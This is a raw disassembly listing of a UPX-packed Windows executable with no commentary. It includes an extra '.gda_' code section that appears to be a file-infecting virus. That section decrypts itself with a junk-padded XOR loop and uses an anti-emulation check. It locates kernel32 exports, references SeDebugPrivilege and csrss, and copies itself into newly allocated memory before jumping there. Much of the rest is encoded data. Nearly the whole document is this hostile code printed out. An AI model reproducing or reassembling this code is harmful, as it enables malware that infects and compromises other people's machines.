dd 0ED994912h, 9FBB54F7h, 1400DBFDh, 0CBCA3AC4h, 0FF1C3B71h
dd 1A21E424h, 6D93CDCFh, 8FCDB0F6h, 3F812C66h, 76CDF31Eh
dd 0B8B0FBFFh, 12CDC383h, 0CBC9A85Dh, 99AD251Dh, 24B64FECh
dd 0A6485A0Bh, 1B14C096h, 3FD9767Eh, 0EBA7294Ch, 0E9BA9CF3h
dd 26F43416h, 3FFEEE71h, 0EFCF5FBh, 0EF133BF9h, 376B4629h
dd 4766DE5Fh, 0ECA0A8ECh, 16CDFFFDh, 0FFC5B701h, 0E9ECE9EDh
dd 0E1FCB7FDh, 7FB7012Ch, 0F5CA21F7h, 0F25AFCFCh, 0FCF7EBFCh
dd 0D6ABAAF5h, 0BFEC34C7h, 0AAF9FFFCh, 2A25B459h, 0ACC9662Ah
dd 0B7819093h, 83639D90h, 9271CDC9h, 17DD8430h, 3519BFFEh
dd 95D91451h, 2A91720Ah, 68EBC871h, 0D21FFFFFh, 80D512A5h
dd 0AA529AE1h, 2A8D146Fh, 12B9C89Ah, 474A9A8Bh, 0DFDBFFFFh
dd 9BAB9EC3h, 20A319DBh, 0DDA26CECh, 9EED85BDh, 81E8A2DFh
dd 125544EBh, 0FFF9A1C8h, 961FBDB7h, 12EB8D2Eh, 5A9A85D8h
dd 9A099D12h, 96F8105Ah, 613FF76Dh, 664922D0h, 12FEFD7Fh
dd 0C25AA987h, 680C0295h, 1285EDDBh, 5A910482h, 7FCFF7CBh
dd 0FF372139h, 4D53FF85h, 53187242h, 0FCFEFFC8h, 62FE97FFh
dd 43500200h, 57544583h, 204B524Fh, 474F5250h, 204D4152h
dd 7DAC5231h, 4C17CD6Bh, 24D4E41h, 56EBAB0Ah, 15661D6Ah
dd 676B03B7h, 0D2DD6EBBh, 0E707576h, 27611A33h, 5832234Dh
dd 96C3E54Ch, 32323221h, 79D6312Eh, 18DA6B06h, 8B323C20h
dd 50BB73A4h, 2207192Bh, 5123FF0Ch, 7D8363h, 140A1104h
dd 0FD40520h, 0A0BB5BD1h, 4B4C0069h, 0B7505353h, 923DBF97h
dd 0E00882E0h, 2400574Ah, 64006Eh, 0EE6D8B6Fh, 73007502h
dd 130743Ah, 0D912DB09h, 398CDBh, 2E1D2335h, 0D913907h
dd 0ABDA0098h, 49922008h, 57DAE406h, 6760D89Fh, 0F2000370h
dd 7472346h, 3203C8DCh, 6000640h, 237F0110h, 151FFFFAh
dd 48E0888Ah, 44004F00h, 7A6A19FEh, 6F49E4F2h, 1CFFB022h
dd 2530AF28h, 53671074h, 0D7DF5CE1h, 7590A796h, 5C040030h
dd 0BAEEBD07h, 85A35D7h, 2E4D615Ch, 38003607h, 46C6EDB1h
dd 1B30772Eh, 43EC0049h, 336761CFh, 633F00E8h, 2DBFA264h
dd 0DC08201Fh, 0FF164004h, 0DEDE00h, 0E41EC242h, 9F16000Eh
dd 40260201h, 6137EFB8h, 11031928h, 97D96C8Bh, 7468D835h
dd 2A9B70D3h, 852DB69Ch, 9F256B7Ch, 0EB480E10h, 47B03BAh
dd 5413541Bh, 3F63265Ah, 59ADB9F7h, 0CBC75C22h, 5876545h
dd 907BD800h, 10030BE6h, 0B810B848h, 0FD8F0B0Eh, 6A05BFFFh
dd 0C391928h, 9B11D0B1h, 4FC000A8h, 5FF52ED9h, 0F68A885Dh
dd 0EBFC2FB2h, 9F11C91Ch, 102B3CE8h, 0CD16048h, 92BCA3F4h
dd 0A06045CFh, 470CA00Ch, 0B1879006h, 0CA0000Ch, 277FDF24h
dd 9004088h, 703EC00h, 8F60D900h, 401495F0h, 40707C4Fh
dd 1F0700BFh, 4314BD91h, 13857813h, 0F84F3C81h, 0A65BAB00h
dd 0F81013E9h, 0E31A8B2Fh
dd 0EFEFF39h, 4FBE4023h, 806183Ah, 0B9438884h, 7C9E4F10h
dd 1FFEEBAh, 200C10B8h, 3E420DADh, 7F0726CCh, 0E4AFD80Fh
dd 118BCB3h, 840F8470h, 0F200DF0Fh, 0F9521h, 0F0847F02h
dd 0F93C9B0h, 9A000F6Ch, 5BD911A8h, 13436F95h, 8127F958h
dd 586E691Fh, 72502050h, 0DB679000h, 1444614h, 906B3239h
dd 3C89F927h, 2751512h, 43005341h, 1C81AF64h, 7FEB0194h
dd 695FFF3h, 255C5CC6h, 70695C73h, 81662463h, 0FF071CECh
dd 2EA6A3E4h, 655300FFh, 75626544h, 85766967h, 0FD93A767h
dd 64411F46h, 5461756Ah, 6E656B6Fh, 93FB7317h, 6F4C36DCh
dd 56707512h, 65756C61h, 0B1A91741h, 704FB7EDh, 24636F28h
dd 43003473h, 1D4B062Ah, 333F6176h, 6CE0AFE3h, 6D4C7954h
dd 7F12BAF9h, 5F1565A3h, 79617254h, 430F3957h, 0A5B6A5B7h
dd 521E6135h, 54056F6Ch, 0AA546B68h, 56140C73h, 6D5CDF77h
dd 416D6EA6h, 78455328h, 8D6E3E7Bh, 35ACF4BEh, 22F3F54Bh
dd 50545448h, 0E25FBD83h, 32204012h, 4B4F205Bh, 6D010A0Dh
dd 4BEA56B7h, 2D0244A3h, 4B67044Ch, 315BECD9h, 7525203Ah
dd 56282F18h, 540F6B5Bh, 0A726B979h, 0AB518A70h, 8763D4CDh
dd 0D6062F15h, 0CBD53DCAh, 0CD72972Dh, 546B57A3h, 4473168h
dd 0FFFAF82Fh, 6468F74Ah, 8D73CFE9h, 6376736Dh, 68596A71h
dd 6977CFA9h, 0FBEC5DF5h, 5F32076Eh, 78EB7517h, 36380307h
dd 3734D34Dh, 33343536h, 3A69A569h, 307CBF7h, 20303132h
dd 39BB3B9Fh, 3D003833h, 0C833707h, 3536C832h, 320E3334h
dd 313220C8h, 0A56B7830h, 3AF7A426h, 0D8BBD9D0h, 533FFE5Eh
dd 5754464Fh, 5C455241h, 736F694Dh, 0D85CD76Fh, 0C3B07E1Ah
dd 7275435Ch, 0DC561572h, 885C573h, 525C0A6Fh, 239F6E75h
dd 0DA146F74h, 24D6A16Dh, 53203068h, 0ED87FB1Bh, 3FE728FFh
dd 64736E67h, 2B796A72h, 1980265h, 530064DCh, 155F0A51h
dd 0E4B619Ah, 664B4D6Ch, 0CD899087h, 0C549235Fh, 2F05538h
dd 0FF540A18h, 43205317h, 0DDA3EE5h, 76206762h, 58763FD5h
dd 6DECD96Ch, 23B53284h, 165B1B7Ch, 471A17B2h, 1F8D1723h
dd 931299BFh, 707379h, 0D62D6342h, 0C3208D1Ah, 1B132361h
dd 0ED6D80C0h, 9752206Dh, 443772DDh, 2D2DBB9Eh, 661220E4h
dd 0AC6D672Fh, 6C2FF62Ah, 632463C9h, 79746922h, 6E614D20h
dd 16C8051Eh, 31BC1AB9h, 146B0A8Ah, 0A24E2370h, 1BBC4ABh
dd 6488F6E8h, 6572463Fh, 0DF50C65h, 0FC01B8A5h, 4D746547h
dd 4665876Fh, 97F0066Bh, 6D614EE2h, 736C0168h, 95637274h
dd 0BBDEE05Bh, 706F430Ah, 9D0A1979h, 291F1445h, 326578DCh
dd 6F6F544Ah, 0FDA2936Ch, 337063BFh, 616E5332h, 6F687370h
dd 2B9C1974h, 126B7745h, 0F737232h, 3E358F54h, 2C5CC160h
dd 654E2118h, 87887478h, 6169C16Dh, 76455441h, 57FF6DBDh
dd 69616B0Bh, 726F4674h, 7B673C53h, 0B06A624Fh, 76AE8856h
dd 22DD442Ch, 6E6FEF8Dh, 0B6972F6h, 6573C83Ah, 646E6148h
dd 25EDB00Ch, 5E24477Bh, 6DD26E08h, 61EF7084h, 4493F05Ah
dd 6CEDB7A3h, 79645673h, 61984C14h, 866E492Bh, 66DD6ED8h
dd 9530F6Fh, 49067065h, 0E02CD998h, 656B260Dh, 0B3284564h
dd 36623364h, 0E0CC366Eh, 0B9FEC447h, 64410B12h, 70F7264h
dd 7DECD836h, 7262694Ch, 2BB56761h, 0B2C2824Dh, 137CB9A2h
dd 9ED08ED5h, 63CF02CDh, 0B6816954h, 88B6B0E2h, 4DDE6575h
dd 66CD78E9h, 0CE341245h, 0F684590Dh, 39C45D86h, 0ACD8624Fh
dd 455A843Ch, 0B8DF3178h, 0A4B6DB1h, 2D6D1363h, 85D91B52h
dd 7B5926E7h, 657A8608h, 38216D38h, 154CA7B0h, 0CDDFC45h
dd 60C368D8h, 673A2BD1h, 67E77390h, 79654BA1h, 0B0861045h
dd 0C13B0ED6h, 0F60A510Fh, 0B0109B11h, 0E7309E97h, 61DEDD21h
dd 51E01016h, 2962410Ch, 6EA1070Ah, 46853BEh, 8AF6612Dh
dd 773B8643h, 0B05F6D36h, 0A108946h, 8E611244h, 0E98AEEDh
dd 7966696Eh, 0DB8F67CAh, 75B586D0h, 0CE6C362Bh, 0DC2C796Fh
dd 11D85BD9h, 8F52106Fh, 8D40E3Dh, 1DB4CC0Eh, 148FE436h
dd 75716341h, 494D7269h, 2B9C1669h, 133AA035h, 0B473ECDEh
dd 7273F0CDh, 0B26D06CAh, 5AE60E35h, 0F92862Ch, 1D1D4D53h
dd 5F76856Eh, 5F3F5844h, 7311F668h, 27F502B1h, 982B0702h
dd 7279B6CDh, 110E94Fh, 334D2291h, 1D294562h, 0D8B6527h
dd 150E0073h, 41BB0A14h, 0B4E73098h, 73776649h, 856ED9A7h
dd 66B10570h, 24F44F41h, 18A0D0F6h, 55855604h, 5B01489Bh
dd 0E1141D8h, 0DC1A967h, 36B144Bh, 9963496Eh, 534386E1h
dd 471A8174h, 2543AA3Bh, 73FFA10Dh, 6CB2CB2Ch, 10D0202h
dd 2CB26F39h, 1734B2CBh, 9304090Ch, 13CB2CAAh, 0F9361610h
dd 50D16AADh, 0DC960E45h, 40DD34h, 3FED9A00h, 10F00E0h
dd 0C06010Bh, 83B11226h, 34DC472Ch, 31421023h, 0C966E90Bh
dd 74A02A8h, 0EC0D600Ch, 341E2DCCh, 58840710h, 570692CEh
dd 2B098C2Dh, 6420176Ch, 831E017Ch, 2E8C516Dh, 9024A26Ah
dd 60241F26h, 49FC460h, 0F6642EE0h, 0E11ED90Dh, 2A0714FBh
dd 0E850D227h, 48C01616h, 2F81h, 54C3F800h, 24000000h
dd 0FF0000h, 2 dup(0)
; ---------------------------------------------------------------------------
pusha
mov esi, offset dword_31426000
lea edi, [esi-5000h]
push edi
or ebp, 0FFFFFFFFh
jmp short loc_31427BD2
; ---------------------------------------------------------------------------
align 8
loc_31427BC8: ; CODE XREF: UPX1:loc_31427BD9�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
loc_31427BCE: ; CODE XREF: UPX1:31427C66�j
; UPX1:31427C7D�j
add ebx, ebx
jnz short loc_31427BD9
loc_31427BD2: ; CODE XREF: UPX1:31427BC0�j
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31427BD9: ; CODE XREF: UPX1:31427BD0�j
jb short loc_31427BC8
mov eax, 1
loc_31427BE0: ; CODE XREF: UPX1:31427BEF�j
; UPX1:31427BFA�j
add ebx, ebx
jnz short loc_31427BEB
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31427BEB: ; CODE XREF: UPX1:31427BE2�j
adc eax, eax
add ebx, ebx
jnb short loc_31427BE0
jnz short loc_31427BFC
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_31427BE0
loc_31427BFC: ; CODE XREF: UPX1:31427BF1�j
xor ecx, ecx
sub eax, 3
jb short loc_31427C10
shl eax, 8
mov al, [esi]
inc esi
xor eax, 0FFFFFFFFh
jz short loc_31427C82
mov ebp, eax
loc_31427C10: ; CODE XREF: UPX1:31427C01�j
add ebx, ebx
jnz short loc_31427C1B
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31427C1B: ; CODE XREF: UPX1:31427C12�j
adc ecx, ecx
add ebx, ebx
jnz short loc_31427C28
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31427C28: ; CODE XREF: UPX1:31427C1F�j
adc ecx, ecx
jnz short loc_31427C4C
inc ecx
loc_31427C2D: ; CODE XREF: UPX1:31427C3C�j
; UPX1:31427C47�j
add ebx, ebx
jnz short loc_31427C38
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31427C38: ; CODE XREF: UPX1:31427C2F�j
adc ecx, ecx
add ebx, ebx
jnb short loc_31427C2D
jnz short loc_31427C49
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_31427C2D
loc_31427C49: ; CODE XREF: UPX1:31427C3E�j
add ecx, 2
loc_31427C4C: ; CODE XREF: UPX1:31427C2A�j
cmp ebp, 0FFFFF300h
adc ecx, 1
lea edx, [edi+ebp]
cmp ebp, 0FFFFFFFCh
jbe short loc_31427C6C
loc_31427C5D: ; CODE XREF: UPX1:31427C64�j
mov al, [edx]
inc edx
mov [edi], al
inc edi
dec ecx
jnz short loc_31427C5D
jmp loc_31427BCE
; ---------------------------------------------------------------------------
align 4
loc_31427C6C: ; CODE XREF: UPX1:31427C5B�j
; UPX1:31427C79�j
mov eax, [edx]
add edx, 4
mov [edi], eax
add edi, 4
sub ecx, 4
ja short loc_31427C6C
add edi, ecx
jmp loc_31427BCE
; ---------------------------------------------------------------------------
loc_31427C82: ; CODE XREF: UPX1:31427C0C�j
pop esi
mov edi, esi
mov ecx, 7Eh
loc_31427C8A: ; CODE XREF: UPX1:31427C91�j
; UPX1:31427C96�j
mov al, [edi]
inc edi
sub al, 0E8h
loc_31427C8F: ; CODE XREF: UPX1:31427CB4�j
cmp al, 1
ja short loc_31427C8A
cmp byte ptr [edi], 1
jnz short loc_31427C8A
mov eax, [edi]
mov bl, [edi+4]
shr ax, 8
rol eax, 10h
xchg al, ah
sub eax, edi
sub bl, 0E8h
add eax, esi
mov [edi], eax
add edi, 5
mov eax, ebx
loop loc_31427C8F
lea edi, [esi+5000h]
loc_31427CBC: ; CODE XREF: UPX1:31427CDE�j
mov eax, [edi]
or eax, eax
jz short loc_31427D07
mov ebx, [edi+4]
lea eax, [eax+esi+7000h]
add ebx, esi
push eax
add edi, 8
call dword ptr [esi+708Ch]
xchg eax, ebp
loc_31427CD9: ; CODE XREF: UPX1:31427CFF�j
mov al, [edi]
inc edi
or al, al
jz short loc_31427CBC
mov ecx, edi
jns short near ptr loc_31427CEA+1
movzx eax, word ptr [edi]
inc edi
push eax
inc edi
loc_31427CEA: ; CODE XREF: UPX1:31427CE2�j
mov ecx, 0AEF24857h
push ebp
call dword ptr [esi+7090h]
or eax, eax
jz short loc_31427D01
mov [ebx], eax
add ebx, 4
jmp short loc_31427CD9
; ---------------------------------------------------------------------------
loc_31427D01: ; CODE XREF: UPX1:31427CF8�j
call dword ptr [esi+7094h]
loc_31427D07: ; CODE XREF: UPX1:31427CC0�j
popa
jmp loc_31422334
; ---------------------------------------------------------------------------
align 400h
UPX1 ends
; Section 3. (virtual address 00008000)
; Virtual size : 00002000 ( 8192.)
; Section size in file : 00002000 ( 8192.)
; Offset to raw data for section: 00008000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX2 segment para public 'CODE' use32
assume cs:UPX2
;org 31428000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dd 3 dup(0)
dd 80C4h, 808Ch, 3 dup(0)
dd 80D1h, 809Ch, 3 dup(0)
dd 80DEh, 80A4h, 3 dup(0)
dd 80E9h, 80ACh, 3 dup(0)
dd 80F4h, 80B4h, 3 dup(0)
dd 8100h, 80BCh, 5 dup(0)
dd 77E805D8h, 77E7A5FDh, 77E75CB5h, 0
dd 77DD189Ah, 0
dd 77C3528Dh, 0
dd 77D4C96Ah, 0
dd 7620AFB6h, 0
dd 71AB1A6Dh, 0
dd 4E52454Bh, 32334C45h, 4C4C442Eh, 56444100h, 33495041h
dd 6C642E32h, 534D006Ch, 54524356h, 6C6C642Eh, 45535500h
dd 2E323352h, 6C6C64h, 494E4957h, 2E54454Eh, 6C6C64h, 5F325357h
dd 642E3233h, 6C6Ch, 64616F4Ch, 7262694Ch, 41797261h, 65470000h
dd 6F725074h, 64644163h, 73736572h, 78450000h, 72507469h
dd 7365636Fh, 73h, 43676552h, 65736F6Ch, 79654Bh, 61720000h
dd 646Eh, 72707377h, 66746E69h, 41h, 65746E49h, 74656E72h
dd 6E65704Fh, 41h, 26h dup(0)
dd 0C3906893h, 0C48BED01h, 0E85BD0FFh, 5Fh, 824648Bh, 4EBB8h
dd 64FAEB00h, 18A167h, 0F30408Bh, 830240B6h, 427500F8h
dd 0E8h, 0ED815D00h, 402338h, 2385858Bh, 85030040h, 40238Dh
dd 858BF08Bh, 402389h, 238D8503h, 60500040h, 0C933FE8Bh
dd 2395958Ah, 32AC0040h, 0AAD002C2h, 918D3B41h, 7C004023h
dd 2BC361F1h, 30FF64C0h, 0B8208964h, 12345678h, 60000387h
dd 7BB00000h, 0
dd 1E003142h, 480000h, 75Ch dup(0)
UPX2 ends
; Section 4. (virtual address 0000A000)
; Virtual size : 00010001 ( 65537.)
; Section size in file : 00010001 ( 65537.)
; Offset to raw data for section: 0000A000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_gda_ segment para public 'CODE' use32
assume cs:_gda_
;org 3142A000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dd 0EBDB8700h
db 0
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
cld
sub eax, eax
loc_3142A00B: ; CODE XREF: .gda_:3142A011�j
dec al
or al, al
jz short loc_3142A015
jnz short loc_3142A00B
jmp short loc_3142A07C
; ---------------------------------------------------------------------------
loc_3142A015: ; CODE XREF: .gda_:3142A00F�j
xchg ebx, ebx
cld
cmc
stc
sub ebx, ebx
sub ecx, ecx
mov cl, 1Dh
jmp short $+2
loc_3142A022: ; CODE XREF: .gda_:3142A026�j
lea ebx, [ebx+1]
nop
loop loc_3142A022
stc
cld
call sub_3142A042
; =============== S U B R O U T I N E =======================================
sub_3142A02F proc near ; CODE XREF: sub_3142A042:loc_3142A053�p
mov al, [ecx]
mov eax, eax
xor ax, bx
xchg al, [ecx]
clc
stc
xchg ebx, ebx
xchg ebx, ebx
stc
retn
sub_3142A02F endp
; ---------------------------------------------------------------------------
db 89h, 0C9h
; =============== S U B R O U T I N E =======================================
sub_3142A042 proc near ; CODE XREF: .gda_:3142A02A�p
pop ecx
cld
cmc
sub ecx, 0FFFFFFBFh
push ecx
mov edi, 29BCh
cmc
clc
loc_3142A053: ; CODE XREF: sub_3142A042+21�j
call sub_3142A02F
clc
add ecx, 1
inc ebx
dec edi
xchg ebx, ebx
cmp edi, 0
jnz short loc_3142A053
pop ecx
cmc
nop
leave
cld
xchg ebx, ebx
jmp ecx
sub_3142A042 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 90h
db 0F9h
dd 0E8h, 48BFC00h, 0AB888B24h
; ---------------------------------------------------------------------------
loc_3142A07C: ; CODE XREF: .gda_:3142A013�j
sub [eax], eax
add [ecx+32F398h], cl
add [ecx+400000E1h], al
add [ebx+7404245Ch], cl
sub al, 59h
mov [eax+32F7h], esi
mov cl, [eax+29AFh]
mov [eax+32FBh], edi
cmp cl, 0E8h
jz short loc_3142A0B1
mov ebx, [eax+29B1h]
jmp short loc_3142A0BB
; ---------------------------------------------------------------------------
loc_3142A0B1: ; CODE XREF: .gda_:3142A0A7�j
mov ecx, [eax+29B0h]
mov ebx, [ecx+ebx+2]
loc_3142A0BB: ; CODE XREF: .gda_:3142A0AF�j
mov ebx, [ebx]
push ebp
mov ebp, eax
sub dword ptr [esp+4], 1E75h
sub ebp, 101005h
mov edi, [esp+4]
lea esi, [ebp+1039BCh]
mov ecx, 0
rep movsb
sldt cx
test ecx, ecx
jnz short loc_3142A0EB
or eax, 0FFFFFFFFh
int 2Eh ; DOS 2+ internal - EXECUTE COMMAND
; DS:SI -> counted CR-terminated command string
loc_3142A0EB: ; CODE XREF: .gda_:3142A0E4�j
and ebx, 0FFFFF000h
loc_3142A0F1: ; CODE XREF: .gda_:3142A100�j
cmp dword ptr [ebx+4Eh], 73696854h
jz short loc_3142A102
loc_3142A0FA: ; CODE XREF: .gda_:3142A10F�j
sub ebx, 100h
jnz short loc_3142A0F1
loc_3142A102: ; CODE XREF: .gda_:3142A0F8�j
mov eax, ebx
add eax, [ebx+3Ch]
mov edx, [eax+78h]
cmp word ptr [eax], 4550h
jnz short loc_3142A0FA
add edx, ebx
mov esi, [edx+20h]
mov ecx, [edx+18h]
add esi, ebx
push ecx
loc_3142A11C: ; CODE XREF: .gda_:loc_3142A130�j
lodsd
add eax, ebx
cmp word ptr [eax+2], 5074h
jnz short loc_3142A130
cmp dword ptr [eax+5], 6441636Fh
jz short loc_3142A135
loc_3142A130: ; CODE XREF: .gda_:3142A125�j
loop loc_3142A11C
pop ecx
jmp short loc_3142A160
; ---------------------------------------------------------------------------
loc_3142A135: ; CODE XREF: .gda_:3142A12E�j
sub [esp], ecx
mov esi, [edx+24h]
pop ecx
add esi, ebx
movzx eax, word ptr [esi+ecx*2]
mov edi, [edx+1Ch]
add edi, ebx
mov esi, [edi+eax*4]
add esi, ebx
lea eax, [ebp+101137h]
lea ecx, [ebp+101120h]
mov dx, [eax-19h]
call ecx
jmp short loc_3142A1A7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_3142A1EE
loc_3142A160: ; CODE XREF: .gda_:3142A133�j
; sub_3142A1EE+10�j ...
mov eax, [ebp+1039B0h]
and eax, 400000h
jz short loc_3142A18C
lea esi, [ebp+1039B4h]
lodsd
mov edi, [esp+arg_0]
stosd
mov ebx, [ebp+1042F8h]
movsb
mov edi, [ebp+104300h]
mov esi, [ebp+1042FCh]
loc_3142A18C: ; CODE XREF: sub_3142A1EE-83�j
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_3142A1EE
; ---------------------------------------------------------------------------
mov ah, 0B1h
; =============== S U B R O U T I N E =======================================
sub_3142A190 proc near ; CODE XREF: sub_3142C4BB+2DF�p
push ebx
mov ecx, 2879h
mov ebx, edx
loc_3142A198: ; CODE XREF: sub_3142A190+13�j
xor [eax], dl
sub dl, bl
add eax, 1
xchg bl, bh
xchg dl, dh
loop loc_3142A198
pop ebx
retn
sub_3142A190 endp
; ---------------------------------------------------------------------------
loc_3142A1A7: ; CODE XREF: .gda_:3142A15E�j
call near ptr loc_3142A1B6+2
inc ebx
insb
outsd
jnb short near ptr loc_3142A213+3
dec eax
popa
outsb
db 64h
insb
loc_3142A1B6: ; CODE XREF: .gda_:loc_3142A1A7�p
add gs:[ebx-1], dl
setalc
mov [ebp+103E52h], eax
call near ptr loc_3142A1D2+1
inc ebx
jb short loc_3142A22E
popa
jz short near ptr loc_3142A230+1
inc ebp
jbe short near ptr loc_3142A230+4
outsb
jz short loc_3142A213
loc_3142A1D2: ; CODE XREF: .gda_:3142A1C1�p
add [ebx-1], dl
setalc
mov [ebp+103E56h], eax
call sub_3142A1EE
inc edi
db 65h
jz short near ptr loc_3142A230+1
popa
jnb short near ptr loc_3142A25A+2
inc ebp
jb short near ptr loc_3142A25A+3
outsd
jb short $+2
; =============== S U B R O U T I N E =======================================
sub_3142A1EE proc near ; CODE XREF: .gda_:3142A1DC�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 3142A160 SIZE 0000002E BYTES
; FUNCTION CHUNK AT 3142A594 SIZE 0000000B BYTES
push ebx
call esi ; lstrcat
mov [ebp+103E5Ah], eax
call sub_3142A5BF
test eax, eax
jz loc_3142A160
push eax
call dword ptr [ebp+103E5Ah]
test eax, eax
jnz loc_3142A594
loc_3142A213: ; CODE XREF: .gda_:3142A1D0�j
; .gda_:3142A1AF�j
cmp byte ptr [ebp+10152Fh], 1
jnz short loc_3142A230
push dword ptr [ebp+1042F8h]
dec byte ptr [ebp+10152Fh]
pop dword ptr [ebp+101588h]
loc_3142A22E: ; CODE XREF: .gda_:3142A1C7�j
jmp short loc_3142A237
; ---------------------------------------------------------------------------
loc_3142A230: ; CODE XREF: sub_3142A1EE+2C�j
; .gda_:3142A1CA�j ...
and dword ptr [ebp+101588h], 0
loc_3142A237: ; CODE XREF: sub_3142A1EE:loc_3142A22E�j
and dword ptr [ebp+101578h], 0
and dword ptr [ebp+10157Ch], 0
and dword ptr [ebp+101580h], 0
push edi
mov byte ptr [ebp+1012D4h], 1
mov [ebp+103E5Eh], esi
loc_3142A25A: ; CODE XREF: .gda_:3142A1E6�j
; .gda_:3142A1E9�j
lea esi, [ebp+1015F4h]
xor ecx, ecx
lea edi, [ebp+103E6Ah]
mov cl, 20h
call sub_3142A5FC
pop edi
call dword ptr [ebp+103EAAh]
shr eax, 1Fh
jz loc_3142A353
mov eax, [edi+14h]
push 40h
add eax, ebx
push 8001000h
mov [ebp+103E62h], eax
push 7318h
push 0
call dword ptr [ebp+103EE2h]
test eax, eax
jz loc_3142A594
xchg eax, edi
lea esi, [ebp+101000h]
mov ebp, edi
mov ecx, 0CC6h
sub ebp, 101000h
lea edx, [ebp+101254h]
rep movsd
jmp edx
; ---------------------------------------------------------------------------
sub esp, 20h
mov edi, esp
push 8
xor eax, eax
pop ecx
lea edx, [ebp+101B3Dh]
rep stosd
mov edi, esp
mov [edi+10h], edx
inc byte ptr [edi+1Ch]
push edi
push 10003h
call dword ptr [ebp+103E62h]
add esp, 20h
test eax, eax
jz loc_3142A594
xchg eax, edi
push 0
push 1
push 80000400h
push 10000h
call dword ptr [ebp+103E62h]
test eax, eax
jz loc_3142A594
push 0
push eax
push 40000h
push 0
shr eax, 0Ch
push edi
push 1
push eax
push 10001h
call dword ptr [ebp+103E62h]
push 1000Ah
call dword ptr [ebp+103E62h]
call loc_3142A343
jmp loc_3142A594
; ---------------------------------------------------------------------------
loc_3142A343: ; CODE XREF: sub_3142A1EE+14B�p
; sub_3142A1EE+162�j
push 0
pop ecx
jecxz short locret_3142A352
push 0Ah
call dword ptr [ebp+103ED6h]
jmp short loc_3142A343
; ---------------------------------------------------------------------------
locret_3142A352: ; CODE XREF: sub_3142A1EE+158�j
retn
; ---------------------------------------------------------------------------
loc_3142A353: ; CODE XREF: sub_3142A1EE+8B�j
cmp dword ptr [ebp+103E82h], 0
jz loc_3142A594
call near ptr loc_3142A36A+1
dec esi
push esp
inc esp
dec esp
dec esp
loc_3142A36A: ; CODE XREF: sub_3142A1EE+172�p
add bh, bh
sub_3142A1EE endp ; sp-analysis failed
xchg eax, ebp
sahf
db 3Eh
adc [eax], al
lea esi, [ebp+1017CEh]
xor ecx, ecx
lea edi, [ebp+103EEAh]
mov cl, 0Eh
xchg eax, ebx
call sub_3142A5FC
cmp dword ptr [ebp+103F1Eh], 0
jz loc_3142A594
mov eax, [ebp+103EEEh]
push dword ptr [eax+1]
pop dword ptr [ebp+103907h]
mov eax, [ebp+103F06h]
push dword ptr [eax+1]
pop dword ptr [ebp+103954h]
mov eax, [ebp+103EF2h]
push dword ptr [eax+1]
pop dword ptr [ebp+10395Bh]
mov ecx, [ebp+103EF6h]
jecxz short loc_3142A3E3
push dword ptr [ecx+1]
pop dword ptr [ebp+103968h]
mov ecx, [ebp+103EFEh]
jecxz short loc_3142A3E3
push dword ptr [ecx+1]
pop dword ptr [ebp+103975h]
loc_3142A3E3: ; CODE XREF: .gda_:3142A3C7�j
; .gda_:3142A3D8�j
call sub_3142A5A0
lea edi, [ebp+103F74h]
mov ecx, edi
push 0
neg cl
push dword ptr [eax+4]
and ecx, 3
push 40h
add edi, ecx
push edi
push 0
push 18h
lea esi, [ebp+1015DBh]
mov ecx, 19h
lea eax, ds:0FFFFFFFEh[ecx*2]
stosw
lea eax, ds:0[ecx*2]
stosw
lea eax, [edi+4]
stosd
xor ah, ah
lea edx, [ebp+103E20h]
loc_3142A42C: ; CODE XREF: .gda_:3142A435�j
lodsb
mov [edx], ax
stosw
add edx, 2
loop loc_3142A42C
mov edx, esp
push 0
push 7318h
mov ecx, esp
push 0
mov eax, esp
push 0
push 8000000h
push 40h
push ecx
push edx
push 0Eh
push eax
call dword ptr [ebp+103EFAh]
pop eax
add esp, 40h
push 7318h
mov edx, esp
push 0
mov ecx, esp
push 40h
push 0
push 2
push edx
push 0
push 7318h
push 0
push ecx
push 0FFFFFFFFh
push eax
call dword ptr [ebp+103F02h]
pop edi
pop ecx
test edi, edi
jz loc_3142A594
lea esi, [ebp+101000h]
mov ecx, 0CC6h
mov ebp, edi
rep movsd
sub ebp, 101000h
lea eax, [ebp+10143Ah]
jmp eax
; ---------------------------------------------------------------------------
dw 5450h
dd 0FF6A206Ah, 3F0A95FFh, 0C0850010h, 0E834755Fh, 14Fh
dd 11E8h, 44655300h, 67756265h, 76697250h, 67656C69h, 0E8570065h
dd 550h, 4278B5FFh, 95FF0010h, 103E8Eh, 5295FF57h, 6A00103Eh
dd 0FF026A00h, 103E8295h, 128B900h, 2B970000h, 240C89E1h
dd 95FF5754h, 103EC6h, 0A583F633h, 103F62h, 0FF575400h
dd 103ECA95h, 74C08500h, 0FE834666h, 0FFEE7204h, 6A082474h
dd 0FF2A6A00h, 103EC295h, 74C08500h, 88E893DCh, 33000005h
dd 3AE391C9h, 3F628539h, 32750010h, 24247C81h, 73727363h
dd 0C1812874h, 0E9Fh, 56505450h, 53505051h, 3E7A95FFh
dd 0C0850010h, 0FF0F7459h, 8F082474h, 103F6285h, 0FDC5E800h
dd 0FF53FFFFh, 103E5295h, 818EEB00h, 128C4h, 95FF5700h
dd 103E52h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_3142A1EE
loc_3142A594: ; CODE XREF: sub_3142A1EE+1F�j
